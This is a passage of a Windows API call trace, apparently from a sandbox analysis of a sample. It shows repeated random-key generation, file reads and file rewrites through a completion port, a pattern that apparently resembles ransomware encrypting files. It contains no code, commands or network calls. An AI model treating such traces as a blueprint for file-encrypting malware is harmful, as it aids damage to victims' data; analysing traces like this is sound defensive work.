lpOverlapped=0x3d70450) returned 1 [0143.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.835] CloseHandle (hObject=0xec) returned 1 [0143.836] free (_Block=0x3d70450) [0143.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.836] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0143.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.130] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xb5ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0144.285] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.317] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaa9a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.319] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.331] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x107d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.345] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x955d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.362] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6b01, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.363] CloseHandle (hObject=0x170) returned 1 [0144.363] free (_Block=0x3df0008) [0144.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.374] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.374] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.374] free (_Block=0x3e305b8) [0144.374] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.374] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.375] free (_Block=0x1fa91d0) [0144.375] free (_Block=0x1fa2ed8) [0144.375] free (_Block=0x1fa90b8) [0144.375] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.377] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xfd30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.378] CloseHandle (hObject=0x170) returned 1 [0144.379] free (_Block=0x3df0008) [0144.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.389] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.389] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.389] free (_Block=0x3e305b8) [0144.389] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.389] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.390] free (_Block=0x1fa91d0) [0144.390] free (_Block=0x1fa2ed8) [0144.390] free (_Block=0x1fa90b8) [0144.390] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.392] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb550, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.393] CloseHandle (hObject=0x170) returned 1 [0144.393] free (_Block=0x3df0008) [0144.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.402] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.402] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.402] free (_Block=0x3e305b8) [0144.402] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.403] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.403] free (_Block=0x1fa91d0) [0144.403] free (_Block=0x1fa2ed8) [0144.403] free (_Block=0x1fa90b8) [0144.403] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.403] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.404] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.416] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1104, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.420] CloseHandle (hObject=0x170) returned 1 [0144.420] free (_Block=0x3df0008) [0144.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.430] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.430] free (_Block=0x3e305b8) [0144.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.431] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.431] free (_Block=0x1fa91d0) [0144.431] free (_Block=0x1fa2ed8) [0144.431] free (_Block=0x1fa90b8) [0144.431] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.433] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3c70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.444] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4844, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.445] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.459] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3928, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.460] CloseHandle (hObject=0x170) returned 1 [0144.460] free (_Block=0x3df0008) [0144.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.471] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.471] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.471] free (_Block=0x3e305b8) [0144.471] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.471] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.472] free (_Block=0x1fa91d0) [0144.472] free (_Block=0x1fa2ed8) [0144.472] free (_Block=0x1fa90b8) [0144.472] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.472] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.474] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.475] CloseHandle (hObject=0x170) returned 1 [0144.475] free (_Block=0x3df0008) [0144.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.486] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.486] free (_Block=0x3e305b8) [0144.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.486] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.487] free (_Block=0x1fa91d0) [0144.487] free (_Block=0x1fa2ed8) [0144.487] free (_Block=0x1fa90b8) [0144.487] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.488] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.501] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3394, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.514] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3418, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.516] CloseHandle (hObject=0x170) returned 1 [0144.516] free (_Block=0x3df0008) [0144.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.536] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.537] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.537] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.537] free (_Block=0x3e305b8) [0144.537] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.537] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.537] free (_Block=0x1fa91d0) [0144.537] free (_Block=0x1fa2ed8) [0144.537] free (_Block=0x1fa90b8) [0144.538] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.539] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.552] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x610c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.567] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3734, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.568] CloseHandle (hObject=0x170) returned 1 [0144.568] free (_Block=0x3df0008) [0144.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.578] BCryptGenRandom (in: 